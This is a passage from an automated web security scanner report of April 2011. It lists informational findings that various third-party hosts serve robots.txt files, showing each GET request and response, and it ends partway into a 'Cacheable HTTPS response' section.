Last-Modified: Thu, 16 Sep 2010 16:45:56 GMT
Server: Test & Target
Content-Type: text/plain

User-agent: *
Disallow: /

28.26. http://netsuite-www.baynote.net/baynote/customerstatus2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netsuite-www.baynote.net
Path:   /baynote/customerstatus2

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: netsuite-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1303743002000"
Last-Modified: Mon, 25 Apr 2011 14:50:02 GMT
Content-Type: text/plain
Content-Length: 216
Date: Mon, 25 Apr 2011 15:14:05 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...

28.27. http://odnoklassniki.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odnoklassniki.ru
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: odnoklassniki.ru

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"52-1303437212000"
Last-Modified: Fri, 22 Apr 2011 01:53:32 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 52
Date: Mon, 25 Apr 2011 14:26:37 GMT
Connection: close

User-agent: *
Disallow: /profile/
Disallow: /group/

28.28. http://partner-support.wiki.zoho.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partner-support.wiki.zoho.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: partner-support.wiki.zoho.com

Response

HTTP/1.1 200 OK
Set-Cookie: zwcsrfcki=26f97a57-e7a8-42c8-831f-0a1507f276d0; Path=/
Set-Cookie: JSESSIONID=937B73A17A5A2C608D08D102160832D6; Path=/
Expires: Tue, 24 Apr 2012 12:15:19 GMT
Content-Disposition: inline;filename="robots.txt"
Last-Modified: Mon, 25 Apr 2011 05:15:19 PDT
Content-Type: text/plain;charset=UTF-8
Content-Length: 154
Date: Mon, 25 Apr 2011 12:15:18 GMT
Server: Apache-Coyote/1.1
Connection: close

# Settings file for search engine crawlers
# Example:
# User-agent: *
# Disallow: /*
# Allow: /sitemap.zhtml
User-agent: *
Disallow: /*

28.29. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:58 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

28.30. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 26 Apr 2011 14:34:49 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 25 Apr 2011 14:34:49 GMT
Server: QS

User-agent: *
Disallow: /

28.31. http://pretty.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pretty.ru
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pretty.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:35 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 91
Last-Modified: Fri, 25 Jul 2008 12:11:17 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /a-search

User-agent: Yandex
Disallow: /a-search
Crawl-delay: 100

28.32. http://r2.mail.ru/b13057590.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13057590.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r2.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:29:55 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Mon, 28 Jun 2010 15:55:57 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

28.33. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rbcgaru.hit.gemius.pl
Path:   /_1303741244306/rexdot.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rbcgaru.hit.gemius.pl

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:44:56 GMT
Expires: Tue, 26 Apr 2011 02:44:56 GMT
Accept-Ranges: none
Cache-Control: max-age=43200
Last-Modified: Fri, 25 Mar 2011 05:08:30 GMT
Set-Cookie: Gtestss=Fsq2YwPLQP_9r7xYrzcdmPT7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlSwsBFGvGQp0xo8SLL8RScGGGMaxFmPxD14HsMQGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

28.34. http://rs.mail.ru/d292152.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.mail.ru
Path:   /d292152.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rs.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:45:40 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Mon, 28 Jun 2010 15:55:57 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

28.35. http://s0.2mdn.net/1768829/GM_TS_Q3F11_BTPTsunb_300x250.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /1768829/GM_TS_Q3F11_BTPTsunb_300x250.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 25 Apr 2011 14:10:10 GMT
Expires: Tue, 26 Apr 2011 14:10:10 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 2397

User-agent: *
Disallow: /

28.36. http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGLatCCC6rQgqBbcWAgAPMgW2FgIAAQ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGLatCCC6rQgqBbcWAgAPMgW2FgIAAQ

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:01:27 GMT
Expires: Mon, 25 Apr 2011 12:01:27 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

28.37. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:01:26 GMT
Expires: Mon, 25 Apr 2011 12:01:26 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

28.38. http://search.twitter.com/search.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /search.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:40:08 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 18:04:07 GMT
Accept-Ranges: bytes
Content-Length: 45
Cache-Control: max-age=86400
Expires: Tue, 26 Apr 2011 14:40:08 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /search
Disallow: /*?

28.39. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 25 Apr 2011 15:14:05 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

28.40. http://solutions.kronos.com/content/experience2011  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.kronos.com
Path:   /content/experience2011

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: solutions.kronos.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 18:11:40 GMT
Accept-Ranges: bytes
ETag: "056315cfefcb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:54:38 GMT
Connection: keep-alive
Content-Length: 41

# do not index
User-agent: *
Allow: /

28.41. http://tengrinews.kz/tag/891/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tengrinews.kz
Path:   /tag/891/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tengrinews.kz

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:34:13 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Last-Modified: Thu, 13 Jan 2011 05:43:07 GMT
ETag: "9a69b-ae-499b3cac5d0c0"
Accept-Ranges: bytes
Content-Length: 174
Vary: Accept-Encoding

User-agent: *

Disallow: /unsorted/
Disallow: /search/
Disallow: /admin/
Disallow: /index.php

Host: tengrinews.kz

Sitemap: http://tengrinews.kz/sitemap-index.xml

28.42. http://toolbarqueries.clients.google.com/tbproxy/af/query  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toolbarqueries.clients.google.com
Path:   /tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:01:30 GMT
Expires: Mon, 25 Apr 2011 12:01:30 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

28.43. http://tools.manageengine.com/forums/security-manager/forum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tools.manageengine.com
Path:   /forums/security-manager/forum.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tools.manageengine.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 31 Mar 2011 05:20:00 GMT
ETag: "1da0b2-103-49fc071e1c000"
Accept-Ranges: bytes
Content-Length: 259
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# ------------------------------------------
# AdventNet Inc. -- http://traffic.adventnet.com
# Robot Exclusion File -- robots.txt
# Author: Webmaster
# Last Updated: 11-04-2005
# ------------------
...[SNIP]...

28.44. http://translate.google.com/translate_a/element.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_a/element.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: translate.google.com

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:48:26 GMT
Expires: Mon, 25 Apr 2011 14:48:26 GMT
Cache-Control: private, max-age=0
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: PREF=ID=aee9452c79d75218:TM=1303742906:LM=1303742906:S=BNtTP0A1GiFU3yk-; expires=Wed, 24-Apr-2013 14:48:26 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /?q=
Disallow: /?text=
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
D
...[SNIP]...

28.45. http://translate.googleapis.com/translate_a/t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/t

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: translate.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 25 Mar 2010 09:42:43 GMT
Date: Mon, 25 Apr 2011 14:48:56 GMT
Expires: Mon, 25 Apr 2011 14:48:56 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

28.46. http://widgets.digg.com/buttons/count  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: widgets.digg.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 25 Apr 2011 12:07:31 GMT
Via: NS-CACHE: 100
Server: Apache
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Accept-Ranges: bytes
X-Digg-Time: D=408 (null)
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=86399
Expires: Tue, 26 Apr 2011 12:07:30 GMT
X-CDN: Cotendo
Connection: close

User-agent: *
Disallow: /

28.47. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wtssdc.gartner.com
Path:   /dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wtssdc.gartner.com

Response

HTTP/1.1 200 OK
Content-Length: 277
Content-Type: text/plain
Last-Modified: Fri, 10 Mar 2006 19:37:06 GMT
Accept-Ranges: bytes
ETag: "09d6037a44c61:b1d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 12:10:48 GMT
Connection: close

##############################
#
# WebTrends SmartSource Data Collector
# Copyright (c) 1996-2006 WebTrends Inc. All rights reserved.
# $DateTime: 2006/02/08 13:22:46 $
#
######################
...[SNIP]...

28.48. http://www.gartner.com/DisplayDocument  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /DisplayDocument

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Connection: Close
Content-type: text/plain
Last-modified: Tue, 18 Jan 2011 21:15:30 GMT
Date: Mon, 25 Apr 2011 12:10:49 GMT
Content-Length: 1129
ETag: "pv32d6cbe24ccfa11263b07ca258ef7257"
Expires: Wed, 27 Apr 2011 12:10:49 GMT
Age: 2080
Cache-Control: public, s-maxage=3600, max-age=172800
X-PvInfo: [S10101.C10821.A150986.RA0.G24F27.U2AE07660].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=3d1d2dfcfff196d359e2ca52a278baafb490c0454f080e824db564c8; Path=/

# robots.txt for http://www.gartner.com/    
# Updated: 18 Jan 2011    
User-agent: *
Disallow:/0_admin/PasswordRequest.jsp
Disallow:/0_admin/adm_help.jsp
Disallow:/2_events/audioconferences/
Disallow:/2_ev
...[SNIP]...

28.49. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 25 Apr 2011 12:01:22 GMT
Expires: Mon, 25 Apr 2011 12:01:22 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

28.50. http://www.googleadservices.com/pagead/conversion/1072501689/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1072501689/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:12:13 GMT
Expires: Mon, 25 Apr 2011 12:12:13 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

28.51. http://www.igotyourindex.com/igyindex.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igotyourindex.com
Path:   /igyindex.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.igotyourindex.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 22 Mar 2011 16:50:10 GMT
ETag: "1fb0a6a-17-49f150989d480"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

28.52. http://www.iveco-ptc.spb.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iveco-ptc.spb.ru
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iveco-ptc.spb.ru

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:32:49 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Tue, 19 Apr 2011 09:32:23 GMT
ETag: "205e87-dc-4a1422f75b7c0"
Accept-Ranges: bytes
Content-Length: 220

User-agent: *
Disallow: /home
Disallow: /infor.html
Disallow: /catalog-detail-1/u/1/1
Disallow: /catalog-detail-1/n/10
Disallow: /catalog-detail-1/u/1/5
Disallow: /404
Disallow: /*?_openstat=*
Host: w
...[SNIP]...

28.53. http://www.livejournal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livejournal.com

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:27:56 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
X-AWS-Id: ws47
Last-Modified: Wed, 01 Sep 2010 19:32:58 GMT
ETag: "150b1e0-1b6-48f37c3cfee80"
Accept-Ranges: bytes
Content-Length: 438
X-Varnish: 596074119
Age: 0
Via: 1.1 varnish

User-Agent: *
Disallow: /directory.bml

Sitemap: http://www.livejournal.com/sitemap.xml

#
# Blocked journals aren't listed here because robots.txt files
# can't be above 50k or so, depending on the s
...[SNIP]...

28.54. http://www.manageengine.com/products/security-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /products/security-manager/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manageengine.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:54 GMT
Server: Apache
Last-Modified: Mon, 07 Mar 2011 12:39:16 GMT
ETag: "4e7-49de3c8a16500"
Accept-Ranges: bytes
Content-Length: 1255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# ------------------------------------------
# ZOHO Corp. -- http://www.manageengine.com
# Robot Exclusion File -- robots.txt
# Author: Webmaster
# Last Updated: 16/06/10
# ------------------------
...[SNIP]...

28.55. https://www.manageengine.com/products/security-manager/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /products/security-manager/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manageengine.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:52 GMT
Server: Apache
Last-Modified: Mon, 07 Mar 2011 12:39:16 GMT
ETag: "4e7-49de3c8a16500"
Accept-Ranges: bytes
Content-Length: 1255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# ------------------------------------------
# ZOHO Corp. -- http://www.manageengine.com
# Robot Exclusion File -- robots.txt
# Author: Webmaster
# Last Updated: 16/06/10
# ------------------------
...[SNIP]...

28.56. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketgid.com
Path:   /pnews/773204/i/7269/pp/2/1/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marketgid.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:31:35 GMT
Content-Type: text/plain
Connection: close
Content-Length: 204

User-agent: *
Disallow: /search/
Disallow: /redirect/
Disallow: /news/
Disallow: /rnews/

User-agent: Yandex
Disallow: /search/
Disallow: /redirect/
Disallow: /news/
Disallow: /rnews/
Host: marketgid.
...[SNIP]...

28.57. http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /pages/portal/page_not_found.jspinternal=T

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netsuite.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 195
Content-Disposition: inline;filename="robots.txt"
NS_RTIMER_COMPOSITE: 1564598317:73686F702D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=2823
Date: Mon, 25 Apr 2011 15:13:51 GMT
Connection: close

User-Agent: *
Disallow: /portal/pdf/tos.pdf

Crawl-Delay: 10
User-Agent: *
Disallow: /portal/resource/terms_of_service.shtml

User-Agent: *
Disallow: /portal/resource/terms-of-service.shtml

28.58. http://www.smpone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smpone.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 03 May 2005 10:21:00 GMT
ETag: "2060f40-18-3f63118cc3b00"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

28.59. http://www.tresware.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tresware.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 03 May 2005 11:21:00 GMT
ETag: "1ff8873-18-3f631ef5fdf00"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

28.60. http://www.trucklist.ru/cars/trucks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /cars/trucks

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trucklist.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:38:02 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 113
Last-Modified: Tue, 14 Dec 2010 10:51:53 GMT
Connection: close
Accept-Ranges: bytes

User-Agent: *
Disallow: /help/
Disallow: /login/
Disallow: /sign-up/
Disallow: /cars/search/
Disallow: /*field*

29. Cacheable HTTPS response  previous  next
There are 25 instances of this issue:


29.1. https://checkout.netsuite.com/c.438708/js/eset-netsuite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /c.438708/js/eset-netsuite.js

Request

GET /c.438708/js/eset-netsuite.js HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T&redirect_count=1&did_javascript_redirect=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:25:58 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Length: 25336
Content-Disposition: inline;filename="eset-netsuite.js"
NS_RTIMER_COMPOSITE: -1700559788:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=970
Connection: Keep-Alive
Content-Type: application/octet-stream; charset=UTF-8

// Version 1.6

var ESET_Netsuite = {
currentpage: '',
locale: 'en_US',
customer: '438708',
country: 'US',

init: function() {
if($('__locale')) {
this.locale = $('__locale').get('
...[SNIP]...

29.2. https://checkout.netsuite.com/c.438708/js/lib/mbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /c.438708/js/lib/mbox.js

Request

GET /c.438708/js/lib/mbox.js HTTP/1.1
